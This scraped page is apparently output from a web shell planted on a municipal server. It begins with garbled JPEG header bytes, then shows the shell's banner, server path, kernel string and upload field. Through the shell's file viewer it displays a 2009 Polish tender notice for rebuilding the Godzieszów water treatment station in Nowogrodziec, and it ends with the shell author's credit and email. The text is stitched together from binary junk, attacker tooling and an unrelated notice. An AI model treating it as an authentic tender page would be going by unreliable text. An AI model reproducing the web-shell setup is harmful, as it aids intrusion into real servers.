JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090703/223028-N-2009.html

<p class="kh_header"><b>Nowogrodziec: Przebudowa stacji uzdatniania wody w Godzieszowie - ETAP I w ramach projektu: Budowa wodociągu doprowadzającej wodę do Specjalnej Strefy Ekonomicznej Nowogrodziec - Wykroty wraz z modernizacją stacji uzdatniania wody w Gminie Nowogrodziec</b><br>
<b>Numer ogłoszenia: 223028 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Nowogrodziec , ul. Rynek 1, 59-730 Nowogrodziec, woj. dolnośląskie, tel. 075 7380660, faks 075 7316416.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowogrodziec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa stacji uzdatniania wody w Godzieszowie - ETAP I w ramach projektu: Budowa wodociągu doprowadzającej wodę do Specjalnej Strefy Ekonomicznej Nowogrodziec - Wykroty wraz z modernizacją stacji uzdatniania wody w Gminie Nowogrodziec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są roboty budowlane polegające na prze-budowie stacji uzdatniania wody w miejscowości Godzieszów w ramach budowy sieci wodociągowej doprowadzającej wodę do Specjalnej Strefy Ekono-micznej w miejscowości Wykroty - Gmina Nowogrodziec  obejmujące:

I.Roboty instalacyjne - sanitarne hydrofiltra I

1.Rozbiórka istniejącej instalacji technologicznej hydrofiltra I,
2.Budowa nowej instalacji technologicznej hydrofiltra I,
3.Budowa rurociągów zasilających sieć wodociągową doprowadzającą wodę do wsi Wykroty, Godzieszów oraz do Specjalnej Strefy Ekonomicznej Nowogrodziec - Wykroty,
4.Rozbudowa instalacji dezynfekcji w pomieszczeniu chlorowni,
5.Modernizacja (roboty ogólnobudowlane) pomieszczenia chlorowni - budowa ścianek, tynkowanie, licowanie ścian płytkami, wstawienie drzwi,
6.Próby odbiorowe instalacji z jej płukaniem i dezynfekcją.

II. Budowa przyłączy wodociągowych na terenie stacji uzdatniania wody

1.Roboty ziemne i przygotowawcze,
2.Roboty montażowo- instalacyjne sieci wodociągowej. 

III.  Przebudowa budynku stacji uzdatniania wody w Godzieszowie 

1.Rozbiórka i budowa ogrodzenia terenu stacji uzdatniania wody w Godzieszowie,
2.Modernizacja chodnika i drogi wewnętrznej, 
3.Wymiana pokrycia dachowego z papy,
4.Naprawa schodów betonowych, 

IV.Roboty elektryczne 

1.Przebudowa i rozbudowa rozdzielnic elektrycznych,
2.Przebudowa instalacji technologicznych wewnętrznych z montażem rezerwowego zasilania,
3.Przebudowa i rozbudowa instalacji oświetleniowej i gniazd wtykowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.11.12-3, 45.23.21.50-8, 45.40.00.00-1, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 4.000,00 PLN
Forma wadium.
1) Wadium może być wniesione w następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Roz-woju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
2) W przypadku składania przez Wykonawcę wadium w formie gwarancji gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki stawiane wykonawcom ubiegającym się o udzielenie niniejszego zamówienia:
1. Posiadanie przez wykonawcę uprawnień do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz niepodleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. (Dz. U. z 2007 r. Nr 223  poz. 1655 ze zm.) 
2. Posiadanie przez wykonawcę niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia 
lub posiadania przez inny podmiot(y) potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia, który pisemnie zobowiąże się na rzecz wykonawcy do udostępnienia potencjału technicznego oraz osób zdolnych do wykonania zamówienia. 
3. Znajdowanie się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający dokona oceny spełniania niniejszych warunków wg formuły: spełnia - nie spełnia na podstawie oświadczeń oraz dokumentów złożonych przez wykonawców.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> AD 1. Posiadanie przez wykonawcę uprawnień do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz niepodleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. (Dz. U. z 2007 r. Nr 223  poz. 1655 ze zm.) 
W celu potwierdzenia niniejszego warunku Wykonawcy są zobowiązani przedstawić następujace dokumenty:
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności go-spodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem.
2. Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 pzp, tj. potwierdzające odpowiednio, że w przypadku wykonawcy będącego:
 - osobą fizyczną - tej osoby fizycznej;
 - spółką jawną - wspólnika;
 - spółką partnerską - partnera lub członka zarządu;
 - spółką komandytową - komplementariusza;
 - spółką komandytowo-akcyjną - komplementariusza;
 - osobą prawną (nie wymienioną powyżej) - urzędującego członka organu zarządzającego
nie skazano prawomocnie za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwa przeciwko obrotowi gospodarczemu lub innego przestępstwa popełnionego w celu osiągnięcia korzyści majątkowych.
3. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 pzp, tj. po-twierdzająca, że wobec podmiotu zbiorowego sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary.
4. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wy-konania decyzji właściwego organu.
5.Oświadczenie (z art. 22 ust. 1 pkt 1 - 4) sporządzone według wzoru stanowiącego załącznik nr 2 do części I SIWZ - IDW.
AD 2. Posiadanie przez wykonawcę niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia lub posiadania przez inny podmiot(y) potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia, który pisemnie zobowiąże się na rzecz wykonawcy do udostępnienia potencjału technicznego oraz osób zdolnych do wykonania zamówienia. 
W celu potwierdzenia niniejszego warunku Wykonawcy są zobowiązani przedstawić następujace dokumenty:
1.Wykaz osób (sporządzony według wzorów stanowiących załącznik nr 5 i 6 do IDW), które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Przedłożony przez wykonawcę wykaz i dokumenty muszą potwierdzać, że w realizacji zamówienia brać będą udział:
  1) kierownik budowy - który jako kierownik budowy posiada co najmniej 5 lat doświadczenia zawodowego i co najmniej (w tym okresie) 3 lat do-świadczenia w wykonywaniu prac w zakresie kie-rowania robotami budowlanymi na sieci wodocią-gowej lub sieci wodno -kanalizacyjnej *
  2) kierownik robót br. sanitarna - musi posiadać wyższe wykształcenie techniczne w branży instalacyjno - sanitarnej*.
  3) kierownik robót br. elektryczna - musi posiadać wyższe wykształcenie techniczne w branży elektrycznej*.
 4) pisemne zobowiązanie innego podmiotu(ów) do udostępnienia wykonawcy osób o których mowa w pkt 1, 2 i 3 jeżeli wykonawca nie dysponuje osobami, które spełniają powyższy wymóg. 
* Należy dołączyć kserokopię uprawnień oraz aktualne zaświadczenie potwierdzające wpis na listę członków właściwej izby samorządu zawodowego inżynierów.
2. Wykaz (sporządzony według wzoru stanowiącego  załącznik nr 7 do IDW) co najmniej dwóch robót budowlanych wykonanych przez wykonawcę w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
Przez roboty budowlane odpowiadającą swoim rodzajem i wartością należy rozumieć roboty budowlane spełniające łącznie następujące warunki:
a) o wartości co najmniej 150.000 złotych brutto i
b) obejmujące modernizację stacji uzdatniania wody. Przez modernizację należy rozumieć budowę, przebudowę, nadbudowę lub rozbudowę. Modernizacją nie jest remont w rozumieniu art. 3 ust. 8 ustawy Prawo budowlane polegający na odtworzeniu stanu pierwotnego w istniejącym obiekcie budowlanym.
3. Dokumenty potwierdzające, że zamówienia wskazane w załączniku nr 7 do IDW zostały wykonane należycie. Przedkładane dokumenty muszą zawierać co najmniej:
a) wskazanie, że wykonawca składający ofertę w niniejszym postępowaniu, realizował zamówienie, którego dokument dotyczy,
b) wskazanie podmiotu, na rzecz którego realizowa-ne było zamówienie,
c) wskazanie zakresu realizowanego zamówienia,
d) wskazanie wartości zamówienia,
e) wskazanie daty wykonania,
f) wskazanie miejsca wykonania, 
g) podpis upoważnionego przedstawiciela pod-miotu wskazanego w pkt. b) pod stwierdzeniem, że przedmiot zamówienia opisany w punktach c)-f) został wykonany należycie.
AD.3 Znajdowanie się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
W celu potwierdzenia niniejszego warunku Wykonawcy są zobowiązani przedstawić następujace dokumenty:
1.  Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonaniem niniejszego zamówienia - min. 150.000 PLN.
2. Informacja z banku, w którym wykonawca posiada podstawowy rachunek bankowy potwierdzająca posiadanie przez wykonawcę zdolności kredytowej co najmniej 150.000 złotych lub 
Informacja z banku w którym wykonawca posiada podstawowy rachunek bankowy potwierdzająca posiadanie przez wykonawcę środków pieniężnych w kwocie nie mniejszej niż 150.000 złotych.
Szczegółowe informacje dotyczące daty wystawienia dokumentów i sporządzenia oświadczeń określa SIWZ - część I (IDW).
Kompletna oferta złożona w postępowaniu o udzielenie niniejszego zamówienia musi zawierać następujące dokumenty: 
1) Formularz Ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do IDW,
2) Oświadczenie wykonawcy o spełnianiu przesłanek zawartych w art. 22 ust. 1 pkt 1-4 u. pzp, sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do IDW,
3) Oświadczenie wykonawcy, na podstawie art. 44 u. pzp o spełnianiu wa-runków udziału w niniejszym postępowaniu, sporządzone na podstawie wzoru stanowiącego załącznik nr 3 do IDW,
4) Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1-2 u. pzp, sporządzone na podstawie wzoru stanowiącego załącznik nr 4 do IDW,
5) dowód wniesienia wadium,
6) akceptacja przez wykonawcę wzoru umowy zawartego w Części II SIWZ, sporządzona według wzoru stanowiącego załącznik nr 8 do IDW,
7) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia pu-blicznego,
8) w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej - Pełnomocnictwo(a),
 9) wykaz osób, które będą wykonywać niniejsze zamówienie według wzoru sta-nowiącego załącznik nr 5 do IDW,
10) życiorys zawodowy kierownika budowy wyznaczonego do wykonania niniej-szego zamówienia według wzoru stanowiącego załącznik nr 6 do niniejszej IDW,
11) wykaz wykonanych przez wykonawcę zamówień podobnych według wzoru stanowiącego załącznik nr 7 do IDW,
12) wypełniony załącznik nr 10 i załącznik nr 11 do IDW
13) kosztorys ofertowy
UWAGA: W części 4 przedmiaru robót jako pozycja 35 występuje dostawa agregatu prądotwórczego na ujęcie wody w Gierałtowie. W niniejszym zamówieniu zamawiający rezygnuje z dostawy agregatu. Zatem pozycji 35 części 4 przedmiaru nie należy przyjmować do wyceny ofertowej.
13) Oświadczenie wykonawcy o na podstawie wzoru stanowiącego załącznik nr 12 do IDW,
14) wykaz podwykonawców według wzoru stanowiącego załącznik nr 13 do IDW,
15) dokumenty wymienione w pkt 9.1.1.A, 9.1.1.B i 9.1.1.C IDW.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.1.1.A.1, , pkt. 9.1.1.A.3, pkt. 9.1.1.A.4 IDW, składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie spo-łeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.1.1.A.2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty, o których mowa w pkt. 9.1.1.A.1-4, pkt. 9.1.1.B.3, pkt. 9.1.1.C.1-2 IDW są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kseroko-pia dokumentu jest nieczytelna lub budzi uzasadnione wątpliwości, co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób.
Dokumenty, o których mowa w pkt. 9.2 i pkt. 9.3 IDW, są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii, przetłumaczonych na język polski.
Dokumenty sporządzone w języku obcym, inne niż określone w pkt. 9.6 IDW są również składane wraz z tłumaczeniem na język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.nowogrodziec.biuletyn.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowogrodźcu 
ul. Rynek 1
59-730 Nowogrodziec.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 11:00, miejsce: Urząd Miejski w Nowogrodźcu 
ul. Rynek 1
59-730 Nowogrodziec
pok. nr 1 (Biuro Obsługi Interesanta).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com